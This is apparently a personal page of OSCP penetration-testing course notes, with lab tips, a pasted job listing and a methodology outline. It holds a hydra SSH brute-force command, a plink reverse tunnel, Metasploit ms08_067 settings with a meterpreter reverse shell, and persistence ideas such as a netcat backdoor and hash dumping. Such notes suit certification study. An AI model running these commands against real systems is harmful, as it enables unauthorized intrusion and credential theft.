OSCP Notes
I am posting some notes from my OSCP course for documentation reasons. I have found that executing that right command, could make the difference between owning or not a system. Sometimes, I found myself going through the same procedure/attack twice or thrice only to find out that I was not applying the right command, which costed me not owning the machine.
Make sense of these commands where you need them, as I cannot reveal where they were used:
plink.exe -l root -pw <password> <your kali IP> -R yourport:127.0.0.1:theirport
hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
hydra has the -w option to slow down
#####
- Assist in creating and maintaining IT security policies and procedures leveraged by the IT department.
- Identify IT security compliance control gaps and oversee the documentation and implementation of IT controls to mitigate any found process control gap.
- BS in Computer Science, Information Technology, or a minimum of 5 years IT security related experience.
- Certified Information Systems Security Professional (CISSP) required
- Familiarity with Nmap, NetStumbler, Nessus, Nikto, BackTrack, Harvester, Hping, Wireshark, Metasploit, and other security related tools
#####
Always thoroughly scan the machine, so you won’t miss a vulnerability.
Always do a netstat on machines, to make sure, there are no machines connecting to this machine.
Gabriel ftp machine – enumerate the service banner for the ftp server to get a clue to grab the proof.txt
######
My personal advice is to try to start from the well know exploit (eg. smb), the ones you know the connection between enumeration and exploitation. Then try to enumerate everything and start to search for relationship between services, ports, exploits. I personally begin to succeed only spending time in the lab and on eachmachine … leaving a machine too soon it’s frustrating and every time I found that on the machine I left I was closer to the solution than I taught!
I repeat it’s a personal advice, everyone has his own way to get things done.
For a particular problem you can also chat with your fellows and admins on IRC …
…and finally…Try Harder(R)! 😛
#####
exploit = exploit/windows/smb/ms08_067_netapi
payload = windows/meterpreter/reverse_tcp
set RHOST = 192.XXX.XXX.XXX
set LHOST = 192.XXX.XXX.XXX
set payload = windows/meterpreter/reverse_tcp
show payloads
set target = 0
exploit
it will run
@@@
Enumeration is the key. I know everyone says that, but its very accurate. Check ALL of the ports with nmap, nmap only does the top 1000 ports by default, some things are non-standard. Use different tools. Dirbuster, Dirb, Nikto, Metasploit auxillary scanners, all are very helpful in finding hidden web applications and directories.
Eliminate the easy stuff on every box. You find a user name and password, try basic sql injection, look up the software and download the source code to get a better idea of what its doing. Read the README files, see what the default passwords and user names are.
Don’t get tunnel vision (this one is huge for me) there are many, many red herrings out there. There are applications running that you swear are the way in, but it simply wont work. If you feel like you are banging your head on the wall, look for something else.
Go back and watch the videos and read the PDF. Just going through the motions on the exercises shows you what can be done, putting it to use is the key.
Also, do all of the exercises, they are invaluable. Don’t just follow along, figure out what its doing and why its doing it.
Finally, don’t be afraid to ask for help in IRC. The chat room is an invaluable resource. Nobody has given me an answer, but they point me in the right direction when I’m stuck. Just don’t let that be your first choice, expect to hear “Try harder” if you’ve only tried 2 or three things. If you are asking for help, have a list ready of the things you’ve tried. When most see that you are in fact trying harder, and just over looking it, they normally point you in the right direction.
Good luck, and don’t get discouraged. This is hard, plain and simple. But its hard for a reason, because having this shows you absolutely know your stuff.
Good luck!
@@@@
Words of encouragement and advice. I followed them and sure enough, I hacked my first machine. All I needed was a starting point. I think I’m going to carry on working through all of the machines (in IP order) and then come up with some sort of procedure.
So far I have (for Internal tests):
Enumerate:
Ping Sweep (Bash script or Nmap,)
DNS (Bash script or tools)
Port Scan (us + nmap) both TCP and UDP
Banner Grabbing on port scan results
SNMP enum on port scan results
SMB enum on port scan results
SMTP enum based on port scan results
Exploit:
Using appropriate tools based on Enum results and services running
Pillage:
Dig for files
dump hashes (keeping a record of all usernames with passwords for later use)
wce.exe (if it works)
Maintaining Access:
Back door admin
Netcat/sdb (as a batch/Bash file, at command or startup value in reg)
Clean Up:
Haven’t gotten that far yet.
Repeat until done…
It would be really handy if PBNJ had a nifty web front end for queries and reporting
@@@@@
Will be continued…